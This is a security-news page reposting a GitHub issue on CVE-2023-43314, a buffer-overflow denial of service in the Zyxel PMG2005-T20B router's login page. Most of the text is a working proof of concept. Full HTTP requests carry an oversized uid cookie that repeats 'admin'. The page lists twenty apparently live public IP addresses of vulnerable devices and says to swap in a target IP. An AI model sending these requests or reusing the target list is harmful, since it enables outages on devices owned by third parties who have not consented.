Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-43314: ZYXEL-PMG2005-T20B has a denial of service vulnerability · Issue #1 · Rumble00/Rumble

Buffer Overflow vulnerability in ZYXEL ZYXEL v.PMG2005-T20B allows a remote attacker to cause a denial of service via a crafted script to the uid parameter in the cgi-bin/login.asp component.

CVE
Open in Source
#vulnerability#web#windows#apple#dos#git#buffer_overflow#chrome#webkit

Rumble

ZYXEL-PMG2005-T20B has a denial of service vulnerability.Buffer Overflow vulnerability in ZYXEL ZYXEL v.PMG2005-T20B allows a remote attacker to cause a denial of service via a crafted script to the uid parameter in the cgi-bin/login.asp component.

Zyxel is a leading global provider of comprehensive communication and information solutions, providing innovative technology and product solutions for telecom operators, government and enterprise customers, and consumers worldwide. ZYXEL-PMG2005-T20B has a denial of service vulnerability. Attackers can exploit this vulnerability to cause the browser to crash.

Triggered process:Using a valid SESSIONID of the ZYXEL-PMG2005-T20B product, when the number of admin in the uid reaches 50, backend parsing can cause any web application of the product ZYXEL-PMG2005-T20B to crash.

The following are the details of the vulnerability:
1.Vulnerability Address:http://177.221.16.243/cgi-bin/login.asp
Request Package:
GET /cgi-bin/index.asp HTTP/1.1
Host: 177.221.16.243
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://177.221.16.243/cgi-bin/login.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234
Connection: close

Browser crashes after execution
2.Vulnerability Address:http://179.191.53.240/cgi-bin/login.asp
Request Package:
GET /cgi-bin/index.asp HTTP/1.1
Host: 179.191.53.240
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://179.191.53.240/cgi-bin/login.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234
Connection: close

Browser crashes after execution

Vulnerability Address:http://179.191.53.133/cgi-bin/login.asp

Request Package:
GET /cgi-bin/index.asp HTTP/1.1
Host: 179.191.53.133
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://179.191.53.133/cgi-bin/login.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234
Connection: close

Browser crashes after execution

Vulnerability Address:http://177.221.17.76/cgi-bin/login.asp
Request Package:
GET /cgi-bin/index.asp HTTP/1.1
Host: 177.221.17.76
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://177.221.17.76/cgi-bin/login.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234
Connection: close

Browser crashes after execution

5.Vulnerability Address:http://187.111.205.144/cgi-bin/login.asp
6.Vulnerability Address:http://179.191.53.138/cgi-bin/login.asp
7.Vulnerability Address:http://187.111.205.157/cgi-bin/login.asp
8.Vulnerability Address:http://189.36.156.42/cgi-bin/login.asp
9.Vulnerability Address:http://179.191.53.15/cgi-bin/login.asp
10.Vulnerability Address:http://45.182.161.27/cgi-bin/login.asp
11.Vulnerability Address:http://45.182.161.46/cgi-bin/login.asp
12.Vulnerability Address:http://45.182.161.42/cgi-bin/login.asp
13.Vulnerability Address:http://45.182.161.47/cgi-bin/login.asp
14.Vulnerability Address:http://45.182.161.43/cgi-bin/login.asp
15.Vulnerability Address:http://45.182.161.25/cgi-bin/login.asp
16.Vulnerability Address:http://179.191.53.89/cgi-bin/login.asp
17.Vulnerability Address:http://179.107.195.230/cgi-bin/login.asp
18.Vulnerability Address:http://45.182.161.41/cgi-bin/login.asp
19.Vulnerability Address:http://45.182.161.33/cgi-bin/login.asp
20.Vulnerability Address:http://45.182.161.45/cgi-bin/login.asp

Request package is:
GET /cgi-bin/index.asp HTTP/1.1
Host: IP
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://IP/cgi-bin/login.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234
Connection: close

Replacing the above two IPs with the target IP can cause the browser to crash

The following is a vulnerability replay video:
https://github.com/Rumble00/Rumble/assets/145107465/c1ad7082-513f-427f-9706-30c75097d586

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE